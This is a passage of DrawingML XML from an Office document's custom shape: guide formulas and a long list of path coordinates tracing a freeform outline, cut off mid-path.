                  <a:gd name="T120" fmla="*/ 806 w 952"/>
                  <a:gd name="T121" fmla="*/ 973 h 1428"/>
                  <a:gd name="T122" fmla="*/ 770 w 952"/>
                  <a:gd name="T123" fmla="*/ 1004 h 142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952"/>
                  <a:gd name="T187" fmla="*/ 0 h 1428"/>
                  <a:gd name="T188" fmla="*/ 952 w 952"/>
                  <a:gd name="T189" fmla="*/ 1428 h 1428"/>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952" h="1428">
                    <a:moveTo>
                      <a:pt x="726" y="966"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="741" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="984"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="987"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="989"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713" y="990"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="1031"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="1037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="1037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="786" y="1037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="1037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="799" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="1051"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="1061"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="1071"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="1071"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="1069"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="749" y="1082"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="1092"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="1107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="1109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="1112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="1112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="1115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="1119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="1112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="1113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="1130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="663" y="1132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="1131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="1127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="1119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="1110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="1106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="1130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="1135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="628" y="1144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="1151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="1168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="1195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="1200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="1201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="1196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="1206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="1216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="1221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="1219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="1220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="1228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="1194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="1202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="1210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="1217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="1224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="1227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="1227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="1228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="1235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="1242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="1249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="1250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="516" y="1249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="1250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="1247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="1252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="1260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="1266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="1270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="1273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="1273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="1275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="1282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="1284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="1288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="508" y="1293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="1300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="1302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="1301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="1302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="1310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="1312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="1319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="1317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="1316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="1319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="1326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="1331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="1331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="1330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="1332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="1332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="1339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="1345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="1348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="1364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="1378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="1380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="1379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="1387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="1395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="1398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="1404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="1404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="1404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="1405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="1411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="1419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="1426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="1426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="1422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="1415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="1419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="1428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="1419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="1411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="1408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="1406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="1401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="1398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="1395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="1392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="1388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="1385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="1390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="1390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="1392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="1392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="1393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="1393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="1397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="1401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="1395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="1390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="1387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="1384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="1380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="1374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="1363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="1352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="1349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="1348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="1348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="1344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="1343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="1339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="1332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="1326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="1322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="1321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="1320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="1319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="1315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="1305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="1303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="1304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="1295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="1292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="1288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="1282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="1276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="1271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="1269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="1263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="1258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="1260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="1261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="1263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="1270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="1272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="1277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="1271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="1261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="1248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="1240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="1234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="1229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="1230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="1230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="1224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="1215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="1209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="1199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="1200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="1196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="1197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="1192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="1189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="1189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="1188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="1186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="1174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="1173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="1174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="1174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="1171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="1167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="1162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="1162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="1159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="1154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="1156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="1151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="1148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="1145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="1145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="1143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="1138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="1140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="1143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="1144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="1146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="1149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="1151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="1144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="1130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="1125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="1119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="1116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="1110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="1109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="1106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="1094"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="1089"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="1088"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="1090"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="1088"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="1081"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="1077"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="1071"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="1062"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="1053"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="1044"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="1044"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="1017"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="1007"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="1006"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="1003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="1003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="1016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="1026"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="1014"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="992"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="981"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="970"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="967"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="956"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="949"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="969"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="957"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="950"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="935"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="909"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="906"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="889"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="872"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="794"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="780"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="763"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="726"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="722"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="717"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="616"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="598"/>
